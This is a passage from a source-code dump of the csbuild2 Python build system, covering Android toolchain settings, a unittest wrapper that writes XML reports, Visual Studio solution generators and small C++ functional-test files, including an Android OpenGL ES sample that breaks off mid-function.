root path.\n\t\t:type path: str\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.SetValue(\"androidSdkRootPath\", os.path.abspath(path) if path else None)\n\n\t@staticmethod\n\tdef SetAndroidManifestFilePath(path):\n\t\t\"\"\"\n\t\tSets the path to the Android manifest file.\n\n\t\t:param path: Android manifest file path.\n\t\t:type path: str\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.SetValue(\"androidManifestFilePath\", os.path.abspath(path))\n\n\t@staticmethod\n\tdef SetAndroidTargetSdkVersion(version):\n\t\t\"\"\"\n\t\tSets the Android target SDK version.\n\n\t\t:param version: Android target SDK version.\n\t\t:type version: int\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.SetValue(\"androidTargetSdkVersion\", version)\n\n\t@staticmethod\n\tdef SetAndroidStlLibType(lib):\n\t\t\"\"\"\n\t\tSets the Android STL lib type.\n\n\t\t:param lib: Android STL lib type.\n\t\t:type lib: str\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.SetValue(\"androidStlLibType\", lib)\n\n\t@staticmethod\n\tdef SetAndroidNativeAppGlue(useDefaultAppGlue):\n\t\t\"\"\"\n\t\tSets a boolean to use the default Android native app glue.\n\n\t\t:param useDefaultAppGlue: Use default Android native app glue?\n\t\t:type useDefaultAppGlue: bool\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.SetValue(\"androidNativeAppGlue\", useDefaultAppGlue)\n" }, { "alpha_fraction": 0.6762012243270874, "alphanum_fraction": 0.6797060370445251, "avg_line_length": 29.60553550720215, "blob_id": "45b6468ce3a2381a522f09a867fa6e4e3af3cadd", "content_id": "76ab3aaf3a127e41488f26903a2e6a5b3270d8c9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8845, "license_type": "permissive", "max_line_length": 145, "num_lines": 289, "path": "/csbuild/_testing/testcase.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2016 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: testcase\n\t:synopsis: Thin wrapper around python unittest that adds some extra information (mostly logging in setUp)\n\n.. moduleauthor:: Jaedyn K. 
Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport unittest\nimport sys\nimport time\nimport os\n\nfrom xml.etree import ElementTree\nfrom xml.dom import minidom\n\n\ninitialized = False\n\n\ndef _init():\n\t\"\"\"Initialize some test environment data\"\"\"\n\tglobal initialized\n\tif not initialized:\n\t\tfrom .._utils import shared_globals, terminfo\n\n\t\tinitialized = True\n\t\tshared_globals.startTime = time.time()\n\n\t\tshared_globals.colorSupported = terminfo.TermInfo.SupportsColor()\n\t\tshared_globals.showCommands = True\n\n\nclass _TestContainer(object):\n\tdef __init__(self, className):\n\t\tself.className = className\n\t\tself.successCount = 0\n\t\tself.failureCount = 0\n\n\nclass TestCase(unittest.TestCase):\n\t\"\"\"\n\tThin wrapper around python unittest to provide more details on test progress\n\t\"\"\"\n\t_runTestCases = set()\n\t_currentTestCase = None # type: _TestContainer\n\t_totalSuccess = 0\n\t_totalFail = 0\n\t_failedTestNames = []\n\n\tdef __init__(self, methodName):\n\t\tsuper(TestCase, self).__init__(methodName)\n\t\tself.success = True\n\t\t_init()\n\n\tdef run(self, result=None):\n\t\t\"\"\"\n\t\tRuns the test suite.\n\n\t\t:param result: optional test result\n\t\t:type result: unittest.TestResult\n\t\t\"\"\"\n\t\tfrom .. import log\n\t\tif self.__class__.__name__ not in TestCase._runTestCases:\n\t\t\tTestCase.PrintSingleResult()\n\t\t\tTestCase._runTestCases.add(self.__class__.__name__)\n\t\t\tTestCase._currentTestCase = _TestContainer(self.__class__.__name__)\n\t\t\tlog.Test(\"RUNNING TEST SUITE: <&CYAN>{}</&>\", self.__class__.__name__)\n\n\t\tlog.Test(\" Running test:\t {}.<&CYAN>{}</&> ...\", self.__class__.__name__, self._testMethodName)\n\t\tunittest.TestCase.run(self, result)\n\t\tif self.success:\n\t\t\tlog.Test(\"\t ... <&DGREEN>[</&><&GREEN>Success!</&><&DGREEN>]\")\n\t\t\tTestCase._currentTestCase.successCount += 1\n\t\t\tTestCase._totalSuccess += 1\n\t\telse:\n\t\t\tlog.Test(\"\t ... <&DRED>[</&><&RED>Failed!</&><&DRED>]\")\n\t\t\tTestCase._currentTestCase.failureCount += 1\n\t\t\tTestCase._totalFail += 1\n\t\t\tTestCase._failedTestNames.append(\"{}.<&CYAN>{}</&>\".format(self.__class__.__name__, self._testMethodName))\n\n\tdef TestName(self):\n\t\t\"\"\"Get the test method name for this test\"\"\"\n\t\treturn self._testMethodName\n\n\tdef TestDoc(self):\n\t\t\"\"\"Get the docstring attached to this test\"\"\"\n\t\treturn self._testMethodDoc\n\n\t@staticmethod\n\tdef PrintSingleResult():\n\t\t\"\"\"\n\t\tPrint the result of the last test suite, if any have been run\n\t\t\"\"\"\n\t\tfrom .. import log\n\t\tif TestCase._currentTestCase is not None:\n\t\t\ttxt = \"{} <&GREEN>{}</&> test{} succeeded\".format(\n\t\t\t\tTestCase._currentTestCase.className,\n\t\t\t\tTestCase._currentTestCase.successCount,\n\t\t\t\t\"s\" if TestCase._currentTestCase.successCount != 1 else \"\"\n\t\t\t)\n\t\t\tif TestCase._currentTestCase.failureCount > 0:\n\t\t\t\ttxt += \", <&RED>{}</&> failed\".format(TestCase._currentTestCase.failureCount)\n\t\t\telse:\n\t\t\t\ttxt += \"!\"\n\t\t\ttxt += \"\\n----------------------------------------------------------------------\"\n\t\t\tlog.Test(txt)\n\n\t@staticmethod\n\tdef PrintOverallResult():\n\t\t\"\"\"\n\t\tPrint the overall result of the entire unit test run\n\t\t\"\"\"\n\t\tfrom .. 
import log\n\t\ttxt = \"Unit test results: <&GREEN>{}</&> test{} succeeded\".format(\n\t\t\tTestCase._totalSuccess,\n\t\t\t\"s\" if TestCase._totalSuccess != 1 else \"\"\n\t\t)\n\t\tif TestCase._totalFail > 0:\n\t\t\ttxt += \", <&RED>{}</&> failed\".format(TestCase._totalFail)\n\t\telse:\n\t\t\ttxt += \"!\"\n\t\tif TestCase._totalFail > 0:\n\t\t\ttxt += \"\\nFailed tests:\"\n\t\t\tfor failedTest in TestCase._failedTestNames:\n\t\t\t\ttxt += \"\\n\\t\" + failedTest\n\t\tlog.Test(txt)\n\n\nclass TestResult(unittest.TextTestResult):\n\t\"\"\"\n\tThin wrapper of unittest.TextTestResult to print out a little more info at the start and end of a test run\n\n\t:param xmlfile: File to store the result xml data in\n\t:type xmlfile:\n\tFor the other parameters, see unittest.TextTestResult\n\t\"\"\"\n\tdef __init__(self, stream, descriptions, verbosity, xmlfile=None):\n\t\tsuper(TestResult, self).__init__(stream, descriptions, verbosity)\n\t\tself.testList = {}\n\t\tself.timer = 0\n\t\tself.xmlfile = xmlfile\n\n\tdef startTestRun(self):\n\t\t\"\"\"\n\t\tStart running the test suite\n\t\t\"\"\"\n\t\tsys.stdout.write(\"----------------------------------------------------------------------\\n\")\n\n\tdef stopTestRun(self):\n\t\t\"\"\"\n\t\tStop running the test suite\n\t\t\"\"\"\n\t\tTestCase.PrintSingleResult()\n\t\tTestCase.PrintOverallResult()\n\t\tfailureDict = dict(self.failures)\n\t\terrorDict = dict(self.errors)\n\t\tskipDict = dict(self.skipped)\n\t\troot = ElementTree.Element(\"testsuites\")\n\t\tadd = ElementTree.SubElement\n\n\t\tsuites = {}\n\n\t\tfor test, testTime in self.testList.items():\n\t\t\tif test.__class__.__name__ not in suites:\n\t\t\t\tsuites[test.__class__.__name__] = {}\n\t\t\tsuites[test.__class__.__name__][test] = testTime\n\n\t\tfor suiteName, tests in suites.items():\n\t\t\tsuiteTime = 0\n\t\t\tfor _, testTime in tests.items():\n\t\t\t\tsuiteTime += testTime\n\n\t\t\tsuite = add(\n\t\t\t\troot,\n\t\t\t\t\"testsuite\",\n\t\t\t\tname = suiteName,\n\t\t\t\ttests=str(len(self.testList)),\n\t\t\t\terrors=str(len(errorDict)),\n\t\t\t\tfailures=str(len(failureDict)),\n\t\t\t\tskipped=str(len(skipDict)),\n\t\t\t\ttime=\"{:.3f}\".format(suiteTime)\n\t\t\t)\n\n\t\t\tfor test, testTime in tests.items():\n\t\t\t\tcase = add(suite, \"testcase\", classname=\"{}.{}\".format(suiteName, test.TestName()), name=str(test.TestDoc()), time=\"{:.3f}\".format(testTime))\n\t\t\t\tif test in failureDict:\n\t\t\t\t\tadd(case, \"failure\").text = failureDict[test]\n\t\t\t\tif test in errorDict:\n\t\t\t\t\tadd(case, \"error\").text = errorDict[test]\n\t\t\t\tif test in skipDict:\n\t\t\t\t\tadd(case, \"skipped\").text = skipDict[test]\n\t\twith open(self.xmlfile, \"w\") as f:\n\t\t\tf.write(minidom.parseString(ElementTree.tostring(root)).toprettyxml(\"\\t\", \"\\n\"))\n\t\t\tf.flush()\n\t\t\tos.fsync(f.fileno())\n\n\tdef startTest(self, test):\n\t\t\"\"\"\n\t\tStart a single test\n\n\t\t:param test: The test to start\n\t\t:type test: TestCase\n\t\t\"\"\"\n\t\tsuper(TestResult, self).startTest(test)\n\t\tif test.__class__.__name__ != \"ModuleImportFailure\":\n\t\t\tself.timer = time.time()\n\n\tdef stopTest(self, test):\n\t\t\"\"\"\n\t\tStop a single test\n\n\t\t:param test: The test to stop\n\t\t:type test: TestCase\n\t\t\"\"\"\n\t\tsuper(TestResult, self).stopTest(test)\n\t\t# Python 3.5 changed from ModuleImportFailure to _FailedTest...\n\t\tif test.__class__.__name__ != \"_FailedTest\" and test.__class__.__name__ != \"ModuleImportFailure\":\n\t\t\tself.testList[test] = time.time() - 
self.timer\n\n\tdef addError(self, test, err):\n\t\t# pylint: disable=protected-access\n\n\t\t# Some syntax changes between python 2 and python 3 require us to make separate modules.\n\t\t# But the unittest system doesn't know about that and will try to import them. If it does it'll give us\n\t\t# this ModuleImportFailure. We have to detect this and selectively ignore it for those specific modules.\n\t\t# But ONLY for those modules.\n\n\t\t# Python 3.5 changed from ModuleImportFailure to _FailedTest...\n\t\tfrom .. import log\n\n\t\tsuper(TestResult, self).addError(test, err)\n\t\tlog.Error(self.errors[-1][1])\n\t\ttest.success = False\n\n\tdef addFailure(self, test, err):\n\t\t# pylint: disable=protected-access\n\n\t\t# See comment in addError above\n\t\tfrom .. import log\n\n\t\tsuper(TestResult, self).addFailure(test, err)\n\t\tlog.Error(self.failures[-1][1])\n\t\ttest.success = False\n\n\tdef printErrors(self):\n\t\t\"\"\"\n\t\tPrint errors. (Or in this case, don't. We did it earlier.)\n\t\t\"\"\"\n\t\tpass\n\n\nclass TestRunner(unittest.TextTestRunner):\n\t\"\"\"\n\tThin wrapper around TextTestRunner to allow passing an xml file to the result\n\n\t:param xmlfile: File to store the result xml data in\n\t:type xmlfile: str\n\tFor the other parameters, see unittest.TextTestRunner\n\t\"\"\"\n\tresultclass = TestResult\n\n\tdef __init__(self, xmlfile, *args, **kwargs):\n\t\tsuper(TestRunner, self).__init__(*args, **kwargs)\n\t\tself.xmlfile=xmlfile\n\n\tdef _makeResult(self):\n\t\treturn self.resultclass(self.stream, self.descriptions, self.verbosity, self.xmlfile)\n" }, { "alpha_fraction": 0.7727164626121521, "alphanum_fraction": 0.7796757817268372, "avg_line_length": 40.8708610534668, "blob_id": "4ecba8221f073bae1f3cd7906d9f2fc379f69dcb", "content_id": "0ea5f7086e54c6fa72b4530f432bdda2de4b403f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12645, "license_type": "no_license", "max_line_length": 125, "num_lines": 302, "path": "/csbuild/tools/project_generators/visual_studio/__init__.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2018 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. package:: visual_studio\n\t:synopsis: Visual Studio project generators\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nfrom . 
import internal\n\nfrom .platform_handlers import VsBasePlatformHandler\n\nfrom csbuild._utils.decorators import TypeChecked\n\nfrom csbuild.toolchain import SolutionGenerator\n\nfrom csbuild.tools.common.msvc_tool_base import MsvcToolBase\nfrom csbuild.tools.common.tool_traits import HasDefines, HasIncludeDirectories, HasCxxLanguageStandard\n\n\ndef _writeProjectFiles(outputDir, solutionName, projects, version):\n\tgenerators = [x.toolchain.Tool(VsProjectGenerator) for x in projects]\n\n\t# Remove all generators that have no project data.\n\tgenerators = [gen for gen in generators if gen.projectData]\n\n\tinternal.WriteProjectFiles(outputDir, solutionName, generators, version)\n\n\n@TypeChecked(handlers=dict)\ndef UpdatePlatformHandlers(handlers):\n\t\"\"\"\n\tAdd custom platform handlers to the Visual Studio generator.\n\n\t:param handlers: Dictionary of platform handler mappings to their build targets.\n\t:type handlers: dict[ tuple[ str, str, str or None or tuple[str] ], class ]\n\t\"\"\"\n\tinternal.UpdatePlatformHandlers(handlers)\n\n\n@TypeChecked(enable=bool)\ndef SetEnableFileTypeFolders(enable):\n\t\"\"\"\n\tHelper function to toggle the \"file type folder\" feature in the project generator.\n\n\t:param enable: Enable file type folders in the generated projects.\n\t:type enable: bool\n\t\"\"\"\n\tif isinstance(enable, bool):\n\t\tinternal.ENABLE_FILE_TYPE_FOLDERS = enable\n\n\nclass VsProjectGenerator(MsvcToolBase, HasDefines, HasIncludeDirectories, HasCxxLanguageStandard):\n\t\"\"\"\n\tVisual Studio project generator\n\n\t:param projectSettings: A read-only scoped view into the project settings dictionary\n\t:type projectSettings: toolchain.ReadOnlySettingsView\n\t\"\"\"\n\tinputGroups = internal.ALL_FILE_EXTENSIONS\n\toutputFiles = { \".proj\" }\n\n\tdef __init__(self, projectSettings):\n\t\tMsvcToolBase.__init__(self, projectSettings)\n\t\tHasDefines.__init__(self, projectSettings)\n\t\tHasIncludeDirectories.__init__(self, projectSettings)\n\t\tHasCxxLanguageStandard.__init__(self, projectSettings)\n\n\t\tself._projectData = None\n\t\tself._sourceFiles = []\n\t\tself._groupSegments = []\n\n\tdef SetupForProject(self, project):\n\t\ttry:\n\t\t\tMsvcToolBase.SetupForProject(self, project)\n\t\texcept:\n\t\t\t# Do nothing on failure. This likely means something went wrong with trying to find\n\t\t\t# an installation of Visual Studio. 
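UpdatePlatformHandlers above keys its dict by (toolchain, architecture, target) tuples, where the target slot may be a single name, a tuple of names, or None, and maps them to VsBasePlatformHandler subclasses. A minimal registration sketch under those assumptions; the handler class, toolchain/architecture strings, and target names below are hypothetical placeholders rather than values defined by csbuild:

# Hypothetical handler; assumes a VsBasePlatformHandler subclass needs no extra setup here.
class MyWin32PlatformHandler(VsBasePlatformHandler):
	pass

UpdatePlatformHandlers({
	# (toolchain, architecture, target name(s)); None is assumed to mean "all targets".
	("msvc", "x86", None): MyWin32PlatformHandler,
	("msvc", "x64", ("debug", "release")): MyWin32PlatformHandler,
})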
Nothing is completely dependent on this, so it's\n\t\t\t# ok if it fails.\n\t\t\tpass\n\n\t\tHasDefines.SetupForProject(self, project)\n\t\tHasIncludeDirectories.SetupForProject(self, project)\n\t\tHasCxxLanguageStandard.SetupForProject(self, project)\n\n\tdef RunGroup(self, inputProject, inputFiles):\n\t\tself._projectData = inputProject\n\t\tself._sourceFiles = [x.filename for x in inputFiles]\n\t\t# TODO: Once project groups are implemented, parse it for the current project and store the results in self._groupSegments.\n\n\t\treturn \"{}.proj\".format(inputProject.outputName)\n\n\t@property\n\tdef sourceFiles(self):\n\t\t\"\"\"Project source files\"\"\"\n\t\treturn self._sourceFiles\n\n\t@property\n\tdef groupSegments(self):\n\t\t\"\"\"Project group segments\"\"\"\n\t\treturn self._groupSegments\n\n\t@property\n\tdef includeDirectories(self):\n\t\t\"\"\"Project include directories\"\"\"\n\t\treturn self._includeDirectories\n\n\t@property\n\tdef defines(self):\n\t\t\"\"\"Project defines\"\"\"\n\t\treturn self._defines\n\n\t@property\n\tdef cxxLanguageStandard(self):\n\t\t\"\"\"Project C++ language standard\"\"\"\n\t\treturn self._cxxStandard\n\n\t@property\n\tdef projectData(self):\n\t\t\"\"\"Project settings data\"\"\"\n\t\treturn self._projectData\n\nclass VsSolutionGenerator2010(SolutionGenerator):\n\t\"\"\"Visual Studio 2010 solution generator\"\"\"\n\n\t@staticmethod\n\tdef GenerateSolution(outputDir, solutionName, projects): # pylint: disable=missing-raises-doc\n\t\t\"\"\"\n\t\tGenerates the actual solution file from the projects generated by each tool.\n\t\tThe actual project objects are passed to the solution generator, allowing the generator to gather information\n\t\tabout the projects themselves, as well as outputs returned from the project generator tools\n\t\t(via project.inputFiles[\".ext\"], which is a list of csbuild._build.input_file.InputFile objects) and\n\t\tdata on the tools (via calling methods and properties on the tool through project.toolchain.Tool(ToolType).Method()\n\t\tor project.toolchain.Tool(ToolType).property)\n\n\t\t:param outputDir: Top-level directory all solution files should be placed into\n\t\t:type outputDir: str\n\t\t:param solutionName: Desired base name of the solution\n\t\t:type solutionName: str\n\t\t:param projects: Set of all built projects\n\t\t:type projects: list[csbuild._build.project.Project]\n\t\t\"\"\"\n\t\t_writeProjectFiles(outputDir, solutionName, projects, internal.Version.Vs2010)\n\n\nclass VsSolutionGenerator2012(SolutionGenerator):\n\t\"\"\"Visual Studio 2012 solution generator\"\"\"\n\n\t@staticmethod\n\tdef GenerateSolution(outputDir, solutionName, projects): # pylint: disable=missing-raises-doc\n\t\t\"\"\"\n\t\tGenerates the actual solution file from the projects generated by each tool.\n\t\tThe actual project objects are passed to the solution generator, allowing the generator to gather information\n\t\tabout the projects themselves, as well as outputs returned from the project generator tools\n\t\t(via project.inputFiles[\".ext\"], which is a list of csbuild._build.input_file.InputFile objects) and\n\t\tdata on the tools (via calling methods and properties on the tool through project.toolchain.Tool(ToolType).Method()\n\t\tor project.toolchain.Tool(ToolType).property)\n\n\t\t:param outputDir: Top-level directory all solution files should be placed into\n\t\t:type outputDir: str\n\t\t:param solutionName: Desired base name of the solution\n\t\t:type solutionName: str\n\t\t:param projects: Set of all built projects\n\t\t:type 
projects: list[csbuild._build.project.Project]\n\t\t\"\"\"\n\t\t_writeProjectFiles(outputDir, solutionName, projects, internal.Version.Vs2012)\n\n\nclass VsSolutionGenerator2013(SolutionGenerator):\n\t\"\"\"Visual Studio 2013 solution generator\"\"\"\n\n\t@staticmethod\n\tdef GenerateSolution(outputDir, solutionName, projects): # pylint: disable=missing-raises-doc\n\t\t\"\"\"\n\t\tGenerates the actual solution file from the projects generated by each tool.\n\t\tThe actual project objects are passed to the solution generator, allowing the generator to gather information\n\t\tabout the projects themselves, as well as outputs returned from the project generator tools\n\t\t(via project.inputFiles[\".ext\"], which is a list of csbuild._build.input_file.InputFile objects) and\n\t\tdata on the tools (via calling methods and properties on the tool through project.toolchain.Tool(ToolType).Method()\n\t\tor project.toolchain.Tool(ToolType).property)\n\n\t\t:param outputDir: Top-level directory all solution files should be placed into\n\t\t:type outputDir: str\n\t\t:param solutionName: Desired base name of the solution\n\t\t:type solutionName: str\n\t\t:param projects: Set of all built projects\n\t\t:type projects: list[csbuild._build.project.Project]\n\t\t\"\"\"\n\t\t_writeProjectFiles(outputDir, solutionName, projects, internal.Version.Vs2013)\n\n\nclass VsSolutionGenerator2015(SolutionGenerator):\n\t\"\"\"Visual Studio 2015 solution generator\"\"\"\n\n\t@staticmethod\n\tdef GenerateSolution(outputDir, solutionName, projects): # pylint: disable=missing-raises-doc\n\t\t\"\"\"\n\t\tGenerates the actual solution file from the projects generated by each tool.\n\t\tThe actual project objects are passed to the solution generator, allowing the generator to gather information\n\t\tabout the projects themselves, as well as outputs returned from the project generator tools\n\t\t(via project.inputFiles[\".ext\"], which is a list of csbuild._build.input_file.InputFile objects) and\n\t\tdata on the tools (via calling methods and properties on the tool through project.toolchain.Tool(ToolType).Method()\n\t\tor project.toolchain.Tool(ToolType).property)\n\n\t\t:param outputDir: Top-level directory all solution files should be placed into\n\t\t:type outputDir: str\n\t\t:param solutionName: Desired base name of the solution\n\t\t:type solutionName: str\n\t\t:param projects: Set of all built projects\n\t\t:type projects: list[csbuild._build.project.Project]\n\t\t\"\"\"\n\t\t_writeProjectFiles(outputDir, solutionName, projects, internal.Version.Vs2015)\n\n\nclass VsSolutionGenerator2017(SolutionGenerator):\n\t\"\"\"Visual Studio 2017 solution generator\"\"\"\n\n\t@staticmethod\n\tdef GenerateSolution(outputDir, solutionName, projects): # pylint: disable=missing-raises-doc\n\t\t\"\"\"\n\t\tGenerates the actual solution file from the projects generated by each tool.\n\t\tThe actual project objects are passed to the solution generator, allowing the generator to gather information\n\t\tabout the projects themselves, as well as outputs returned from the project generator tools\n\t\t(via project.inputFiles[\".ext\"], which is a list of csbuild._build.input_file.InputFile objects) and\n\t\tdata on the tools (via calling methods and properties on the tool through project.toolchain.Tool(ToolType).Method()\n\t\tor project.toolchain.Tool(ToolType).property)\n\n\t\t:param outputDir: Top-level directory all solution files should be placed into\n\t\t:type outputDir: str\n\t\t:param solutionName: Desired base name of the 
solution\n\t\t:type solutionName: str\n\t\t:param projects: Set of all built projects\n\t\t:type projects: list[csbuild._build.project.Project]\n\t\t\"\"\"\n\t\t_writeProjectFiles(outputDir, solutionName, projects, internal.Version.Vs2017)\n\n\nclass VsSolutionGenerator2019(SolutionGenerator):\n\t\"\"\"Visual Studio 2019 solution generator\"\"\"\n\n\t@staticmethod\n\tdef GenerateSolution(outputDir, solutionName, projects): # pylint: disable=missing-raises-doc\n\t\t\"\"\"\n\t\tGenerates the actual solution file from the projects generated by each tool.\n\t\tThe actual project objects are passed to the solution generator, allowing the generator to gather information\n\t\tabout the projects themselves, as well as outputs returned from the project generator tools\n\t\t(via project.inputFiles[\".ext\"], which is a list of csbuild._build.input_file.InputFile objects) and\n\t\tdata on the tools (via calling methods and properties on the tool through project.toolchain.Tool(ToolType).Method()\n\t\tor project.toolchain.Tool(ToolType).property)\n\n\t\t:param outputDir: Top-level directory all solution files should be placed into\n\t\t:type outputDir: str\n\t\t:param solutionName: Desired base name of the solution\n\t\t:type solutionName: str\n\t\t:param projects: Set of all built projects\n\t\t:type projects: list[csbuild._build.project.Project]\n\t\t\"\"\"\n\t\t_writeProjectFiles(outputDir, solutionName, projects, internal.Version.Vs2019)\n\n\nclass VsSolutionGenerator2022(SolutionGenerator):\n\t\"\"\"Visual Studio 2022 solution generator\"\"\"\n\n\t@staticmethod\n\tdef GenerateSolution(outputDir, solutionName, projects): # pylint: disable=missing-raises-doc\n\t\t\"\"\"\n\t\tGenerates the actual solution file from the projects generated by each tool.\n\t\tThe actual project objects are passed to the solution generator, allowing the generator to gather information\n\t\tabout the projects themselves, as well as outputs returned from the project generator tools\n\t\t(via project.inputFiles[\".ext\"], which is a list of csbuild._build.input_file.InputFile objects) and\n\t\tdata on the tools (via calling methods and properties on the tool through project.toolchain.Tool(ToolType).Method()\n\t\tor project.toolchain.Tool(ToolType).property)\n\n\t\t:param outputDir: Top-level directory all solution files should be placed into\n\t\t:type outputDir: str\n\t\t:param solutionName: Desired base name of the solution\n\t\t:type solutionName: str\n\t\t:param projects: Set of all built projects\n\t\t:type projects: list[csbuild._build.project.Project]\n\t\t\"\"\"\n\t\t_writeProjectFiles(outputDir, solutionName, projects, internal.Version.Vs2022)\n" }, { "alpha_fraction": 0.4838709533214569, "alphanum_fraction": 0.5806451439857483, "avg_line_length": 6.5, "blob_id": "01f481e43cd7215cbac45d6c732feb41620ef4c0", "content_id": "fb3667f706b22deef21f72fd70534c341e6ced5b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 31, "license_type": "no_license", "max_line_length": 12, "num_lines": 4, "path": "/functional_tests/explicit_sources_test/project/source/wrong/getnum.cpp", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "\nint getnum()\n{\n\treturn 789;\n}\n" }, { "alpha_fraction": 0.5782642364501953, "alphanum_fraction": 0.5848508477210999, "avg_line_length": 26.747312545776367, "blob_id": "4f90b612e407fb15cac12643d435b0f0fec8aba9", "content_id": "92f5c641f66c8e23db96a9fbd5b5025f039e3c95", "detected_licenses": [], "is_generated": false, 
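Each VsSolutionGeneratorXXXX class above differs only in the internal.Version value it forwards to _writeProjectFiles, so picking a Visual Studio version is just a matter of which generator class gets invoked. A sketch of calling the entry point directly; normally csbuild's solution-generation run mode drives this, and the directory, name, and project list here are placeholders:

# Hypothetical direct invocation; builtProjects stands in for the set csbuild assembles.
VsSolutionGenerator2022.GenerateSolution(
	"_solutions",      # outputDir: placeholder path
	"MyGame",          # solutionName: placeholder base name
	builtProjects,     # list[csbuild._build.project.Project]
)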
"is_vendor": false, "language": "C++", "length_bytes": 5162, "license_type": "no_license", "max_line_length": 88, "num_lines": 186, "path": "/functional_tests/android_test/hello_world/jni/main.cpp", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "\n#include <EGL/egl.h>\n#include <GLES2/gl2.h>\n\n#include <android/input.h>\n#include <android_native_app_glue.h>\n\n#include <android/log.h>\n#define LOGI(...) ((void)__android_log_print(ANDROID_LOG_INFO, __FILE__, __VA_ARGS__))\n#define LOGW(...) ((void)__android_log_print(ANDROID_LOG_WARN, __FILE__, __VA_ARGS__))\n\nextern \"C\" {\n\nstatic EGLDisplay display;\nstatic EGLSurface surface;\nstatic EGLContext context;\n\nstatic void gles_init(struct android_app *android_app)\n{\n display = eglGetDisplay(EGL_DEFAULT_DISPLAY);\n eglInitialize(display, 0, 0);\n\n const int config_attribs[] = {\n EGL_RED_SIZE, 0,\n EGL_GREEN_SIZE, 0,\n EGL_BLUE_SIZE, 0,\n EGL_ALPHA_SIZE, 0,\n EGL_DEPTH_SIZE, 0,\n EGL_STENCIL_SIZE, 0,\n EGL_SAMPLES, 0,\n EGL_SAMPLE_BUFFERS, 0,\n EGL_SURFACE_TYPE, EGL_WINDOW_BIT,\n EGL_RENDERABLE_TYPE, EGL_OPENGL_ES2_BIT,\n EGL_NONE\n };\n\n LOGI(\"EGL_VENDOR: %s\", eglQueryString(display, EGL_VENDOR));\n LOGI(\"EGL_VERSION: %s\", eglQueryString(display, EGL_VERSION));\n LOGI(\"EGL_CLIENT_APIS: %s\", eglQueryString(display, EGL_CLIENT_APIS));\n LOGI(\"EGL_EXTENSIONS: %s\", eglQueryString(display, EGL_EXTENSIONS));\n\n EGLConfig config;\n int num_configs;\n eglChooseConfig(display, config_attribs, &config, 1, &num_configs);\n\n int format;\n eglGetConfigAttrib(display, config, EGL_NATIVE_VISUAL_ID, &format);\n ANativeWindow_setBuffersGeometry(android_app->window, 0, 0, format);\n\n surface = eglCreateWindowSurface(display, config, android_app->window, NULL);\n\n const int context_attribs[] = {\n EGL_CONTEXT_CLIENT_VERSION, 2,\n EGL_NONE\n };\n eglBindAPI(EGL_OPENGL_ES_API);\n context = eglCreateContext(display, config, EGL_NO_CONTEXT, context_attribs);\n\n eglMakeCurrent(display, surface, surface, context);\n\n LOGI(\"GL_VERSION: %s\", glGetString(GL_VERSION));\n LOGI(\"GL_VENDOR: %s\", glGetString(GL_VENDOR));\n LOGI(\"GL_RENDERER: %s\", glGetString(GL_RENDERER));\n LOGI(\"GL_EXTENSIONS: %s\", glGetString(GL_EXTENSIONS));\n}\n\nstatic void gles_quit()\n{\n eglMakeCurrent(display, EGL_NO_SURFACE, EGL_NO_SURFACE, EGL_NO_CONTEXT);\n eglDestroyContext(display, context);\n eglDestroySurface(display, surface);\n eglTerminate(display);\n}\n\nstatic void gles_paint()\n{\n glClearColor(0.2, 0.4, 0.7, 1.0);\n glClear(GL_COLOR_BUFFER_BIT);\n\n eglSwapBuffers(display, surface);\n}\n\nstatic void app_cmd_callback(struct android_app *android_app, int32_t 